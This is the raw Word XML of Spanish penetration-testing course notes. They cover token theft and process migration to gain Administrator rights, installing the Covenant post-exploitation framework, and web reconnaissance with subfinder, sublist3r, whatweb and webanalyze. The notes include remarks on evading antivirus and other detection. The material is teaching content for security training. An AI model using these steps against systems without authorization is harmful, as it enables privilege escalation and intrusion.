    <w:p w14:paraId="57C763C6" w14:textId="7D0399AC" w:rsidR="006A0583" w:rsidRDefault="006A0583" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Podemos mostrar los proceos del sistema y buscar alguno de algún administrador: </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314696A7" w14:textId="1B2720BE" w:rsidR="006A0583" w:rsidRPr="006A0583" w:rsidRDefault="006A0583" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>steal_token (pid del proceso a robar)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2DEB8C" w14:textId="452E7543" w:rsidR="006A0583" w:rsidRDefault="006A0583" w:rsidP="00843E37">
      <w:r>
        <w:t xml:space="preserve">Ahora podríamos ejecutar </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>, y después ya tendremos la credenciales de Administrador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E0C9D7" w14:textId="7C8BE4C8" w:rsidR="006A0583" w:rsidRPr="00040C54" w:rsidRDefault="00040C54" w:rsidP="00040C54">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040C54">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>También podemos migrar nuestro proceso a el proceso del Administrador, para ello:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F4C366" w14:textId="50082499" w:rsidR="00040C54" w:rsidRPr="00040C54" w:rsidRDefault="00040C54" w:rsidP="00040C54">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040C54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>migrate (pid del proceso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D30FDCC" w14:textId="156B4ACB" w:rsidR="00040C54" w:rsidRPr="00040C54" w:rsidRDefault="00040C54" w:rsidP="00040C54">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040C54">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Simplemente con esto ya seríamos Administrador. Esto se cerrará cuando el Administrador cierre el proceso original. NO ES RECOMENDABLE HACER ESTO ÚLTIMO, es mejor robarlo pues podemos romper algún proceso importante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D64FBD" w14:textId="77777777" w:rsidR="00040C54" w:rsidRPr="009E13FA" w:rsidRDefault="00040C54" w:rsidP="009E13FA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DFAE54C" w14:textId="72F1CF21" w:rsidR="00040C54" w:rsidRPr="009E13FA" w:rsidRDefault="00040C54" w:rsidP="009E13FA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E13FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Covenant, Framework de Postexplotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C65AB" w14:textId="1939FD99" w:rsidR="00040C54" w:rsidRDefault="00040C54" w:rsidP="00040C54">
      <w:r>
        <w:t>Covenant es un Frameework poco conocido que incorpora muchas de las herramientas vistas anteriormente para Active Directory. Para instalarlo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E09FFC" w14:textId="203D7CAA" w:rsidR="00040C54" w:rsidRPr="009E13FA" w:rsidRDefault="00040C54" w:rsidP="00040C54">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E13FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">git clone --recurse-submodules </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="009E13FA">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://github.com/cobbr/Covenant</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15CF131D" w14:textId="77777777" w:rsidR="00040C54" w:rsidRPr="00040C54" w:rsidRDefault="00040C54" w:rsidP="00040C54">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040C54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>cd Covenant/Covenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F5A31A" w14:textId="77777777" w:rsidR="00040C54" w:rsidRPr="009E13FA" w:rsidRDefault="00040C54" w:rsidP="00040C54">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E13FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dotnet run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D10B410" w14:textId="77777777" w:rsidR="0027020C" w:rsidRDefault="0027020C" w:rsidP="00040C54"/>
    <w:p w14:paraId="16235794" w14:textId="77777777" w:rsidR="0027020C" w:rsidRDefault="0027020C" w:rsidP="00040C54"/>
    <w:p w14:paraId="081651B2" w14:textId="5B1671F3" w:rsidR="0027020C" w:rsidRPr="0027020C" w:rsidRDefault="0027020C" w:rsidP="0027020C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027020C">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Si nos diera error, ejecutamos los siguientes comandos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F66F38A" w14:textId="77777777" w:rsidR="0027020C" w:rsidRPr="0027020C" w:rsidRDefault="0027020C" w:rsidP="0027020C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027020C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>wget https://packages.microsoft.com/config/debian/11/packages-microsoft-prod.deb -O packages-microsoft-prod.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B99DC9C" w14:textId="77777777" w:rsidR="0027020C" w:rsidRPr="0027020C" w:rsidRDefault="0027020C" w:rsidP="0027020C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027020C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sudo dpkg -i packages-microsoft-prod.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B120AB" w14:textId="77777777" w:rsidR="0027020C" w:rsidRPr="0027020C" w:rsidRDefault="0027020C" w:rsidP="0027020C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027020C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>rm packages-microsoft-prod.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F0B58" w14:textId="77777777" w:rsidR="0027020C" w:rsidRPr="0027020C" w:rsidRDefault="0027020C" w:rsidP="0027020C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027020C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A33D42" w14:textId="77777777" w:rsidR="0027020C" w:rsidRPr="0027020C" w:rsidRDefault="0027020C" w:rsidP="0027020C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027020C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sudo apt install -y dotnet-sdk-3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3871E46B" w14:textId="77777777" w:rsidR="0027020C" w:rsidRDefault="0027020C" w:rsidP="0027020C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027020C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>export DOTNET_SYSTEM_GLOBALIZATION_INVARIANT=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D7A53E" w14:textId="3284B660" w:rsidR="0027020C" w:rsidRPr="009E13FA" w:rsidRDefault="0027020C" w:rsidP="009E13FA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027020C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>dotnet run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8CAB9" w14:textId="4ABD0E23" w:rsidR="00040C54" w:rsidRDefault="00C04DD9" w:rsidP="00040C54">
      <w:r>
        <w:t xml:space="preserve">Finalmente, tras compilarse, podremos acceder al navegador para entrar en la interfaz gráfica con: </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="00400BF9">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://127.0.0.1:7443</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009E13FA">
        <w:t>, donde habrá que registrarse. Este Framework centraliza todo lo visto antes</w:t>
      </w:r>
      <w:r w:rsidR="00254718">
        <w:t>. Sin embargo, es preferible uisar los métodos anteriormente vistos, ya que estos Frameworks suelen ser detectados por los antivirus con el tiempo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573B2A87" w14:textId="13DB6951" w:rsidR="00254718" w:rsidRDefault="00254718">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="63640DF5" w14:textId="77777777" w:rsidR="00254718" w:rsidRDefault="00254718" w:rsidP="00040C54"/>
    <w:p w14:paraId="20835319" w14:textId="4D4222BF" w:rsidR="00C04DD9" w:rsidRDefault="00254718" w:rsidP="00040C54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hacking Avanzado de Aplicaciones Web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E258714" w14:textId="6452B891" w:rsidR="00254718" w:rsidRDefault="008D4721" w:rsidP="00254718">
      <w:r>
        <w:t>Es importante llevar una METODOLOGÍA, que nos permita encontrar problemas. Es posible que tras tantear algún sitio facilitado por el cliente, no encontremos nada</w:t>
      </w:r>
      <w:r w:rsidR="00D14A15">
        <w:t>. Para ello lo primero:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C132058" w14:textId="3CFC545E" w:rsidR="00D14A15" w:rsidRPr="00D14A15" w:rsidRDefault="00D14A15" w:rsidP="00254718">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D14A15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BUSQUEDA DE SUBDOMINIOS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4855E816" w14:textId="71C10A81" w:rsidR="00D14A15" w:rsidRDefault="00D14A15" w:rsidP="00D14A15">
      <w:r w:rsidRPr="00D14A15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">subfinder: </w:t>
      </w:r>
      <w:r>
        <w:t>Herramienta para encontrar subdominios usando únicamente fuentes PASIVAS de información.</w:t>
      </w:r>
      <w:r w:rsidR="005B2D78">
        <w:t xml:space="preserve"> Es interesante porque las empresas tienen que pagar por usar un WAF, por lo que es muy posible que los subdominios no estén protegidos. Hay que instalarlo con </w:t>
      </w:r>
      <w:r w:rsidR="005B2D78" w:rsidRPr="005B2D78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo apt install subfinder</w:t>
      </w:r>
      <w:r w:rsidR="005B2D78">
        <w:t xml:space="preserve"> y luego:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB28242" w14:textId="0A879BEB" w:rsidR="006F0403" w:rsidRPr="006F0403" w:rsidRDefault="006F0403" w:rsidP="00D14A15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0403">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>subfinder -d hackthissite.org &gt; subdominios.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E309767" w14:textId="21C9EFF9" w:rsidR="006F0403" w:rsidRDefault="006F0403" w:rsidP="003160F0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006F0403">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B07E325" wp14:editId="0EFE11F8">
            <wp:extent cx="5400040" cy="3719195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9515920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592014" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3719195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4929D559" w14:textId="77777777" w:rsidR="003160F0" w:rsidRDefault="003160F0" w:rsidP="00D14A15"/>
    <w:p w14:paraId="3C26B70A" w14:textId="2E3FF11E" w:rsidR="003160F0" w:rsidRDefault="00AC799B" w:rsidP="00D14A15">
      <w:r w:rsidRPr="00C07295">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Subbrute</w:t>
      </w:r>
      <w:r w:rsidR="003160F0" w:rsidRPr="00C07295">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00C07295" w:rsidRPr="00C07295">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Herramienta ACTIVA, que con fuerza bruta averigua los subdominios. No es recomedable usarla sin contrato:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B701553" w14:textId="0CD0E54C" w:rsidR="00AC799B" w:rsidRPr="00AC799B" w:rsidRDefault="00AC799B" w:rsidP="00D14A15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC799B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo apt install sublist3r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2CFFFF" w14:textId="3C084D83" w:rsidR="00AC799B" w:rsidRPr="00AC799B" w:rsidRDefault="00AC799B" w:rsidP="00D14A15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC799B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sublist3r -d hackthissite.org -b -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295DD087" w14:textId="63DEA73F" w:rsidR="00AC799B" w:rsidRDefault="00C07295" w:rsidP="00C07295">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C07295">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FC2FF04" wp14:editId="26BE2235">
            <wp:extent cx="4534293" cy="4092295"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="13914844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484468" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4534293" cy="4092295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B67EAC" w14:textId="77777777" w:rsidR="00C07295" w:rsidRDefault="00C07295" w:rsidP="00C07295"/>
    <w:p w14:paraId="7B3CFF57" w14:textId="45AC4BCE" w:rsidR="009C3E90" w:rsidRDefault="009C3E90" w:rsidP="00C07295">
      <w:r w:rsidRPr="009C3E90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>WhatWheb:</w:t>
      </w:r>
      <w:r w:rsidRPr="009C3E90">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Es un escáner de aplicaciones web, al que le vamos a pasar el dominio y nos va a identificar de todo, desde correos hasta posibles inyecciones SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557FA830" w14:textId="7A2C5A45" w:rsidR="009C3E90" w:rsidRDefault="009C3E90" w:rsidP="00C07295">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3E90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">whatweb -v </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidRPr="009C3E90">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://192.168.20.133:8080</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12FD6E80" w14:textId="6BB7E3AD" w:rsidR="009C3E90" w:rsidRDefault="009C3E90" w:rsidP="00C07295">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3E90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08A65F1C" wp14:editId="3062023D">
            <wp:extent cx="5400040" cy="2700020"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="20135011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501106" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2700020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0771801F" w14:textId="2D65479E" w:rsidR="009C3E90" w:rsidRDefault="009C3E90" w:rsidP="00C07295">
      <w:r w:rsidRPr="009C3E90">
        <w:t>Esta herramienta se salta los balanceadores, ya que analiza las propias peticiones, en este aspecto es superior a NMAP.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Aunque en lo referente a la geolocalización, en este caos, devuelve la del balanceador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CE2871" w14:textId="77777777" w:rsidR="009C3E90" w:rsidRDefault="009C3E90" w:rsidP="00C07295"/>
    <w:p w14:paraId="5E781F1F" w14:textId="12C2C19B" w:rsidR="009C3E90" w:rsidRDefault="003335D4" w:rsidP="00C07295">
      <w:r w:rsidRPr="003335D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WebAnalyze:</w:t>
      </w:r>
      <w:r w:rsidRPr="003335D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Herramienta similar a whatweb escrita en Go, probablemente sea menos detectada por los sistemas de seguridad. Para instalarla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2F5A69" w14:textId="77777777" w:rsidR="003335D4" w:rsidRPr="003335D4" w:rsidRDefault="003335D4" w:rsidP="003335D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003335D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>go install -v github.com/rverton/webanalyze/cmd/webanalyze@latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C466FE7" w14:textId="77777777" w:rsidR="003335D4" w:rsidRPr="003335D4" w:rsidRDefault="003335D4" w:rsidP="003335D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003335D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>webanalyze -update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B5351" w14:textId="564330D7" w:rsidR="003335D4" w:rsidRPr="009C3E90" w:rsidRDefault="003335D4" w:rsidP="00C07295">
      <w:r>
        <w:t>Y para usarla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B69CD0" w14:textId="0A48D1B1" w:rsidR="009C3E90" w:rsidRDefault="00CB1690" w:rsidP="00C07295">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB1690">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">webanalyze -host </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidRPr="00400BF9">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://(ip/dominio)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A97B3E7" w14:textId="77777777" w:rsidR="00CB1690" w:rsidRDefault="00CB1690" w:rsidP="00C07295"/>
    <w:p w14:paraId="4466B2D1" w14:textId="5634D45B" w:rsidR="001F3DF8" w:rsidRPr="001F3DF8" w:rsidRDefault="001F3DF8" w:rsidP="00C07295">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
